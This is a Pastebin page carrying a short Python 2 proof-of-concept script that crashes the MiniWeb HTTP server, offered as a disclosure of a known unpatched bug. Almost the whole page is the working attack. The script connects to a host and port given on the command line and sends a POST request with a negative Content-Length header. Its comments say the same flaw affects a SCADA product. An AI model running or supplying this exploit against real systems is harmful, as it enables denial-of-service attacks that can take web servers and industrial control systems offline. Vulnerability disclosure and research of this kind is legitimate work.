daily pastebin goal
25%
SHARE
TWEET

MiniWeb Content-Length DoS PoC Exploit

infodox May 31st, 2012 331 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/env python
  2. # miniweb Content-Length DoS PoC
  3. # Not a 0day, sadly.
  4. # aluigi found this ages back, I independantly rediscovered it fuzzing
  5. # and noticed it was still unpatched. Oh well, better disclose so!
  6. # vuln version at code.google.com/p/miniweb/
  7. # affects WinCC also :) (Oh, them SCADA...)
  8. # Massive props to ohdae for helping with this!
  9. # insecurety.net | bindshell.it.cx
  10. import sys
  11. import socket
  12.  
  13. def banner():
  14.     print """
  15. MiniWeb Killer - Kills MiniWeb
  16. -Insecurety Research
  17. -Bindshell Labs
  18. """
  19.  
  20. if len(sys.argv) != 3:
  21.     banner()
  22.     print "Usage: ./MiniDoS.py <host> <port>"
  23.     sys.exit(1)
  24.  
  25. banner()
  26. target = sys.argv[1]
  27. port = sys.argv[2]
  28.  
  29. evil = "POST / HTTP/1.1\r\n"
  30. evil += "Host: %s\r\n" %(target)
  31. evil += "User-Agent: MiniWeb Killer ^-^\r\n"
  32. evil += "Content-Length: -10 \r\n\r\n" # part that kills the box
  33. expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
  34. try:
  35.     expl.connect((target, int(port)))
  36.     print "[+] Connected, firing das payload!"
  37. except:
  38.     print "[-] Connection Failed... Is there even a target?"
  39.     sys.exit(1)
  40. try:
  41.     expl.send(evil)
  42.     print "[+] Payload Sent!"
  43. except:
  44.     print "[-] Payload Sending Failure... WTF?"
  45.     sys.exit(1)
  46. expl.close()
  47. print "[*] Should be dead..."
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top